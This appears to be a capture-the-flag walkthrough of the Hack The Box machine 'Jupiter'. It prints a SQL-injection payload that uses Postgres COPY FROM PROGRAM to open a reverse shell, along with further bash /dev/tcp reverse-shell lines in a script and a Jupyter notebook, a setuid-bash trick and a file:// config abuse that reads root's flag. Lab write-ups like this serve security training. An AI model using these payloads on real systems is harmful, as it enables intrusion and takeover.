Introduction
In this walkthrough, I will go through medium htb box 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/Jupiter-1024x775.png)
Recon
NMAP
As usual there are two ports open 22 and 80.
![](http://techyrick.com/wp-content/uploads/2023/06/image-1024x798.png)
Let’s visit the site 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-1-1024x448.png)
Lets add jupiter.htb to our /etc/hosts file .
Enumeration
I used ffuf and found one subdomain kiosk
, add this to /etc/hosts.
![](http://techyrick.com/wp-content/uploads/2023/06/image-2.png)
Use Burp to visit the kiosk.jupiter.htb & then check the http history 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-3-1024x777.png)
Now send this request to Repeater 🙂
Advertisement
Change the rawSql param value to
"CREATE TABLE cmd_execd(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
Now your modified req will look like this 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-4.png)
Note : Dont forget to start nc listener 🙂
And GG you will get the revshell 🙂
Foothold
![](http://techyrick.com/wp-content/uploads/2023/06/image-5-1024x330.png)
Now we have got postgres user
In /dev/shm we can see the .yml file of juno and we have perm to write into it 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-6-1024x209.png)
Lets upgrade the shell and edit the network-simulation.yml
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/cp
args: /bin/bash /tmp/bash
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/chmod
args: u+s /tmp/bash
start_time: 5s
![](http://techyrick.com/wp-content/uploads/2023/06/image-7-1024x668.png)
After this execute /tmp/bash -p to get the shell as juno
But we cannot read the user.txt because of uid ………………. but there is shadow-simulation.sh file in the home dir . Lets add the revshell to that script.
![](http://techyrick.com/wp-content/uploads/2023/06/image-9-1024x60.png)
Our updated shadow-simulation.html will look like this
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1
After getting the shell as juno we can read the user.txt
![](http://techyrick.com/wp-content/uploads/2023/06/image-8-1024x510.png)
User – Jovian
If you check the id the cmd you will see that juno belong to science group which gives access to /opt/solar-flares/
Do 'grep -rie token
‘ in /opt/solar-flares/logs/
to find the right token of jupyter in the logs based on date.
![](http://techyrick.com/wp-content/uploads/2023/06/image-10-1024x114.png)
lets use chisel to port forward 8888 and use this token
![](http://techyrick.com/wp-content/uploads/2023/06/image-11-1024x579.png)
Now lets use that token of the current date 🙂
After getting logged in we can exec cmd in flares.ipynb file
//RUN
import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"');
![](http://techyrick.com/wp-content/uploads/2023/06/image-12-1024x194.png)
After executing it we will get the shell as Jovian
![](http://techyrick.com/wp-content/uploads/2023/06/image-13-1024x571.png)
Root
Use sudo -l
to check if there is some binary we can run as root user
Jovian can run /usr/local/bin/sattrack
as root. We can get some infos about this executable by using the strings
tool and then grep the output to see if it calls some config file
strings /usr/local/bin/sattrack | grep -i config
Look for it in the filesystem and copy it in the /tmp
folder
find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp
Now by running the sattrack executable as root we can see that it’s able to download in the working directory any file specified in a particular section of the config.json
file. Let’s try to exploit this feature by requesting the root.txt
we want to read.
nano config.json
Find tlesources
section and replace any of the 3 url with file:///root/root.txt
as shown below
"tlesources":[
"file:///root/root.txt",
"http://celestrak.org/NORAD/elements/n...",
"http://celestrak.org/NORAD/elements/g..."
],
Save the new config.json
and simply run sattrack as root. Enjoy the flag!
sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
Conclusion
This box is pretty interesting and stressing at the same time, if you have personal instance then no problem 🙂 I would like to rate this box 5/10.
Have a nice day !
Jay Shri Krishna ❤️❤️